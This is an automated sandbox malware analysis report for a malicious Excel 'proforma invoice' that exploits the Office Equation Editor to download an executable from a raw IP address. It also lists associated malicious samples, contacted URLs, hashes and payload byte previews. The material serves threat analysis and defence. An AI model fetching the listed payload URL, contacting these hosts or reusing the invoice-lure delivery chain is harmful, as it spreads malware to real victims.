34.102.136.180	hacticum.com	United States	15169	GOOGLEUS	false
107.173.229.133	unknown	United States	36352	AS-COLOCROSSINGUS	true
108.167.189.66	www.franquiciasexclusivas.tienda	United States	46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528789
Start date:	25.11.2021
Start time:	19:25:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PROFORMA INVOICE.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@12/26@7/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 20.2% (good quality ratio 18.7%) Quality average: 75.5% Quality standard deviation: 30.4%
HCA Information:	Successful, ratio: 92% Number of executed functions: 89 Number of non-executed functions: 44
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:26:36	API Interceptor	62x Sleep call for process: EQNEDT32.EXE modified
19:26:38	API Interceptor	116x Sleep call for process: vbc.exe modified
19:26:42	API Interceptor	1x Sleep call for process: schtasks.exe modified
19:26:42	API Interceptor	9x Sleep call for process: powershell.exe modified
19:27:00	API Interceptor	181x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
192.0.78.25	Zr26f1rL6r.exe	Get hash	malicious	Browse	www.divorcefearfreedom.com/n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9
	vbc.exe	Get hash	malicious	Browse	www.noyoucantridemyonewheel.com/ht08/?g6=W2JpTxS0fT&OH=60BX3p/mKtTBfKh/fk67FZjwUvooQvGFnObwKG0lT6J6HO9gkgJKpDVv4oxoWu3eJMN2
	PALMETTO STATE PARTS98_xlxs.exe	Get hash	malicious	Browse	www.somewhereat11pm.com/cfb2/?DxlpdHd=FQNpdzT7MRb4jh54gcTYM7WdCCYWgV66X7QuMiK6vr1lSG4+lMLhUSVeG612a6JQnaun&N0D=p2MxC01
	Shipment Invoice Consignment Notification.exe	Get hash	malicious	Browse	www.kgv-lachswehr.com/ea0r/?q6A=c9rlrwb5I0PsvCqZfPZLJ32YxU7lPLK2cV3voPHeBiJjRGf36/O5Za+oFh8vHdrIvELf&6loxs=HBZ0Fn4hGVwHhj
	4Z5YpFMKR0.exe	Get hash	malicious	Browse	www.ctfeldsine.com/benx/?2d3DyD=1sWTfow0M/OcmFQ8c7RvsQXq4lQpokGzy5GD7f0Q5t6djwKRgFzLGePHa9MtusCiNrzCanCAnA==&n2=Q0GdGJJx9bb
	New Order for BDSBMD2021-786-14.doc	Get hash	malicious	Browse	www.fourjmedia.com/w8n5/?6lLtoDQ=Krsevr0acNdBVz6RZ+BCLUY6buAyCdOHDUjLBmAGWGOQ3Ze2Ibajo0mGC0MYdp2HB0MOmQ==&FXa=ynMhLlDX-
	TZsktmCzSW.exe	Get hash	malicious	Browse	www.restauracaorioantigo.com/ad6n/?j8=dN6ap+281HMIx/cBnsfNijKqAg0LuMP5hOtXEPSm2LVrdnh6NyDuph4vZcriwcQUxkSt&ZbvDk=6lVDhp5P
	HSBC-CHINA_2021-11-02.exe	Get hash	malicious	Browse	www.wonderfulwithyou.com/ntfs/?R0GxUr=T3o7Jxac/p1y1HmZ6RD9ch9fD93ONyrGRcDBRgOzANC19oWVMGU/oawwGB6uhQsDw0XQ&fV2TtL=Id6XY6aH1dlL
	r2Nae151Pz.exe	Get hash	malicious	Browse	www.fourjmedia.com/w8n5/?dN9XA=1bj80L6H3ZqhY&qXmt=Krsevr0fcKdFVj2db+BCLUY6buAyCdOHDU7bdlcHSmOR3oywPLLv+weEBRgkGJC0O1Z+
	PO. 2100002R.doc	Get hash	malicious	Browse	www.restauracaorioantigo.com/ad6n/?3feDzx=dN6ap+251AMMxvQNlsfNijKqAg0LuMP5hO1HYMOnyrVqdWN8KiSi/lAta5Her8kn+lHdVw==&4hRH=5jfHHT9HaP5P3fh
	RFQ#.exe	Get hash	malicious	Browse	www.faithtruthresolve.com/unzn/?t0GH=Q6SPythX2&EJE=YX6yD3qjkEh06A43Kvlzsqa1IJGgtNpO3VOCMHkgx/DYA63i6lhcxQdv+JuPBhQOz43WmOdN7Q==
	Betalingskvittering.exe	Get hash	malicious	Browse	www.malatirada.com/b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X
	obizx.exe	Get hash	malicious	Browse	www.nosecretszone.com/fkt8/?ZDK=mNI0BHGsgt7OHZ699uHISkUkIWk4+ipmZNfGtb6EFyltMj3jfdT07SII2zg4v0AJHPvQ&8p=Sr2h-DXxyzvTPn
	triage_dropped_file.exe	Get hash	malicious	Browse	www.reshawna.com/fpdi/?UzrXkD=qrLzJJd/fFMNbEFfGUier/7yxiWYwmIVbn5YkKnBYd+fmPaOJU7aI9nu96TkQnRjXBqS&1bZH=y2J0bDKpKf
	seasonzx.exe	Get hash	malicious	Browse	www.givepy.info/s18y/?u8PLY2=lBZTQLaxpb2Ll&c0DXIl=697MTAEVXvVEXUyAJF20F132oezl1lQlpw2PkmQS81lH+yWLjKrG7SsVWHysXe3cLhwc
	afTyhpBvrtJlTWH.exe	Get hash	malicious	Browse	www.aprendes.academy/bkqi/?sJEPur6=ZqD0GmBALlgJtl6Ab/GdiO1LPlWY5MNY+7zZIQPT6V3NHgLS/8KBw4LFuPUG+2Ik6jGb&v6=z2Jxrb
	Br5q8mvTpP.exe	Get hash	malicious	Browse	www.fis.photos/ef6c/?f4=iVGcxgJb98A8c97jGvHyDNlE3XmNDIFvU6NTGagmHr6XJXD4yK9Jp2kPOI9WE083jhOD&TtZld=2d8t
	EZSOhOh0nx.exe	Get hash	malicious	Browse	www.fis.photos/ef6c/?l6Ahlz=iVGcxgJb98A8c97jGvHyDNlE3XmNDIFvU6NTGagmHr6XJXD4yK9Jp2kPOLdsUlcP5GvE&3f9p=VDKHunXH5l
	Ord20211310570045368963AC.exe	Get hash	malicious	Browse	www.franciscoalpizar.com/gab8/?q8=JN6ty8i&fDK8WrJP=aNn3drJ7qKfGewmMEzfynAYMROYgFs/k/NvBrZcHmhiOvfylsJqCMvOKw90377nS3pzK/k3zjw==
	REQUIREMENT.exe	Get hash	malicious	Browse	www.estudio-me.com/cogu/?E6=L5GjM02Qi9/3ctzLfpX21kbqInICP/PmVfQkFp534KYMBhdy6kz6hr7HyPkdH1b6OtPy&JXeD0V=5jFpKDWXi
151.101.66.159	SOA.scr.exe	Get hash	malicious	Browse	www.allincursive.com/edbs/?1bJ=Fxo0jXLhpT&jpTd3Lg=dd1cZGNCVXB3jbVCz5q9gTpjsXtWO6xHEUQvsBQg9+a/oQvhnHip0QL/9P7MK+3r8W0V
151.101.66.159	RPI_Scanned_30957.doc	Get hash	malicious	Browse	www.driveucars.com/gypo/?ZVahUNV8=4NVpZNOR+1ziDFxt3GIpQUM9WWydCAxb/c1wdQBNaJkA6izdOsFYN7iCdjTfPxrknp7VAg==&2dLp=ZXj8X2Kp-2C

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.franquiciasexclusivas.tienda	vbc.exe	Get hash	malicious	Browse	108.167.189.66
www.franquiciasexclusivas.tienda	Order Form.xlsx	Get hash	malicious	Browse	108.167.189.66

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PLUSSERVER-ASN1DE	C8Tzfg2QIS	Get hash	malicious	Browse	212.162.14.217
	z3hir.arm7	Get hash	malicious	Browse	62.138.219.11
	V56S3UncnV	Get hash	malicious	Browse	89.19.249.213
	Halkbank_Ekstre_20210913_074002_566345_pdf.exe	Get hash	malicious	Browse	31.210.20.79
	tDfXtXb4Oz	Get hash	malicious	Browse	46.163.80.217
	2NSCrCk9wC.exe	Get hash	malicious	Browse	31.210.20.192
	NUo71b3C4p.exe	Get hash	malicious	Browse	151.106.119.144
	rundll32.exe	Get hash	malicious	Browse	151.106.119.144
	RPov9E0iot	Get hash	malicious	Browse	62.138.244.25
	Payment Reference 110121_xlxl.exe	Get hash	malicious	Browse	151.106.116.209
	vbc.exe	Get hash	malicious	Browse	151.106.119.144
	Kem25vPVzE.exe	Get hash	malicious	Browse	151.106.119.144
	HCyigyiCAH	Get hash	malicious	Browse	62.138.220.15
	tzdVV2W5et.exe	Get hash	malicious	Browse	151.106.119.144
	bot.x86_64	Get hash	malicious	Browse	31.210.20.158
	qTSinrPpSB	Get hash	malicious	Browse	31.210.20.158
	QO7FskBRHD	Get hash	malicious	Browse	31.210.20.158
	3JTerIMW7o	Get hash	malicious	Browse	31.210.20.158
	J4otkuWQXB	Get hash	malicious	Browse	31.210.20.158
	0OxK4NR2wM	Get hash	malicious	Browse	62.138.220.15
AUTOMATTICUS	fpvN6iDp5r.msi	Get hash	malicious	Browse	192.0.77.32
	Zr26f1rL6r.exe	Get hash	malicious	Browse	192.0.78.25
	2sX7IceYWM.msi	Get hash	malicious	Browse	192.0.77.32
	vbc.exe	Get hash	malicious	Browse	192.0.78.25
	162AB00C0E943F9548B04F3437867508656480585369C.exe	Get hash	malicious	Browse	74.114.154.18
	zsrIbaaV98	Get hash	malicious	Browse	87.250.173.245
	734C31431B89B7501B984AF35A2D61BDCE27BA87CA484.exe	Get hash	malicious	Browse	74.114.154.22
	E1917F133B3838845A0611AE4E9AC5DB1479461C18644.exe	Get hash	malicious	Browse	74.114.154.18
	LhrTewqQM5.msi	Get hash	malicious	Browse	192.0.77.32
	PALMETTO STATE PARTS98_xlxs.exe	Get hash	malicious	Browse	192.0.78.25
	tqqBpo2P70.msi	Get hash	malicious	Browse	192.0.77.32
	Receipt_INV_460Kbps fdp.htm	Get hash	malicious	Browse	192.0.76.3
	H1MsAU2aiZ.msi	Get hash	malicious	Browse	192.0.77.32
	DFksqChyeZ.msi	Get hash	malicious	Browse	192.0.77.32
	Shipment Invoice Consignment Notification.exe	Get hash	malicious	Browse	192.0.78.25
	AWB_SHIPPING DOCS.exe	Get hash	malicious	Browse	192.0.78.24
	8JY1q5TYnV	Get hash	malicious	Browse	192.0.72.134
	DuxgwH47QB.exe	Get hash	malicious	Browse	192.0.78.24
	ORDER.doc	Get hash	malicious	Browse	192.0.78.24
	FE3AE99417E0D632995AD5CEECCC4C0B308B8A30D2C93.exe	Get hash	malicious	Browse	74.114.154.22

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	444416
Entropy (8bit):	7.8422896972903535
Encrypted:	false
SSDEEP:	12288:Obap00XixBFm3xtkw+Z9Gc6vcu/3G/rTX:Obs00Xi1K+2P+
MD5:	6926A53FA91CAB577D52942A39E5FB53
SHA1:	C15DFC5E94CA97D47FD89DCDC42CC03888334C91
SHA-256:	1BA605473B6FC3B244F25A8838E41A642DBF9566D347D3EA084E96BBE88AEBDE
SHA-512:	02AFC62CCF5C48DD3BFDC2E26EB3C6B997C65DC499D793568D04C3410B0A8961E9C7F738E7E43324D167460C6418EC911CC815A87158680D128D7F80455338FD
Malicious:	true
Reputation:	low
IE Cache URL:	http://107.173.229.133/90009/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(B.a..............0.............6.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...L.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...v..............(.............................................{ .....{!.....{".....{#.....($.....} .....}!.....}"......}#.......0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o...,.(+....{#....{#...o,...+..+....0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30913362.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49DB89C0.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19408
Entropy (8bit):	7.931403681362504
Encrypted:	false
SSDEEP:	384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
MD5:	63ED10C9DF764CF12C64E6A9A2353D7D
SHA1:	608BE0D9462016EA4F05509704CE85F3DDC50E63
SHA-256:	4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
SHA-512:	9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5\|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....\|AQ.h4....x..\6....\|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...\|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..\|0...x...\|..../F....o.._\|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C948E5C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6364
Entropy (8bit):	7.935202367366306
Encrypted:	false
SSDEEP:	192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
MD5:	A7E2241249BDCC0CE1FAAF9F4D5C32AF
SHA1:	3125EA93A379A846B0D414B42975AADB72290EB4
SHA-256:	EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
SHA-512:	A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
Malicious:	false
Preview:	.PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...\|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw.....#..._....I....k.!":...H.....eKN.....9....{%......7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k\|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P\|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V\|.].-Oo..........._.;@c....`.....\|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\566AA7FB.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14828
Entropy (8bit):	7.9434227607871355
Encrypted:	false
SSDEEP:	384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
MD5:	58DD6AF7C438B638A88D107CC87009C7
SHA1:	F25E7F2F240DC924A7B48538164A5B3A54E91AC6
SHA-256:	9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
SHA-512:	C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...\|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..TQ.%..X.......{....,.q.\,.E".........z...abbB...j.\.J.(.b.......\|>...........R....L&..X.eYV"..-.R)B.TM&..pX.j.Z..9..F.Z.6....b.\./%..~...).B<..T.z..D"..(...\...d2YKKK...mm.T..l.T..I$.x<..J..q...J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.\|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..\|>/.Hd2....EQ.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\597470CA.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 600 x 306, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	42465
Entropy (8bit):	7.979580180885764
Encrypted:	false
SSDEEP:	768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
MD5:	C31D090D0B6B5BCA539D0E9DB0C57026
SHA1:	D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
SHA-256:	687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
SHA-512:	B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
Malicious:	false
Preview:	.PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u..'.................//F.......h.++..j...e....A.H?>.......\|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..]\-..yG2Ne.B....\@q....8.....W./i.C..P....O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B2EFE3F.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6364
Entropy (8bit):	7.935202367366306
Encrypted:	false
SSDEEP:	192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
MD5:	A7E2241249BDCC0CE1FAAF9F4D5C32AF
SHA1:	3125EA93A379A846B0D414B42975AADB72290EB4
SHA-256:	EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
SHA-512:	A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
Malicious:	false
Preview:	.PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...\|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw.....#..._....I....k.!":...H.....eKN.....9....{%......7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k\|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P\|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V\|.].-Oo..........._.;@c....`.....\|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C45E1A5.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 600 x 306, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	42465
Entropy (8bit):	7.979580180885764
Encrypted:	false
SSDEEP:	768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
MD5:	C31D090D0B6B5BCA539D0E9DB0C57026
SHA1:	D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
SHA-256:	687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
SHA-512:	B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
Malicious:	false
Preview:	.PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u..'.................//F.......h.++..j...e....A.H?>.......\|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..]\-..yG2Ne.B....\@q....8.....W./i.C..P....O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A725389E.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	498420
Entropy (8bit):	0.6413537721183393
Encrypted:	false
SSDEEP:	384:uXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:AXwBkNWZ3cjvmWa+VDO
MD5:	452FD391823F8EA7FF873D15392FFEAF
SHA1:	11FDC1B34439B07865826D9A4E18963F10468F56
SHA-256:	BE229A40AB073E6A8268D06BAB2EF2EC3F36984F135254C217100D03CC3CB538
SHA-512:	EFC833ACB5BA6854AC058886C8BFA72B04DF7AB6DA062D642FCDB42D2958D54B721CA83806C96A8F8A4EB48B994BBCD25F2A1EA75ADDBDA0A8E3DF80CE183686
Malicious:	false
Preview:	....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................[$.......f.[.@I.%.............D.....RQ.\D..<.........(..$Q.\D..<.. ...Id.[<..D.. .........Y..d.[............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...<..p...8.[......Y.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B8B07368.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14828
Entropy (8bit):	7.9434227607871355
Encrypted:	false
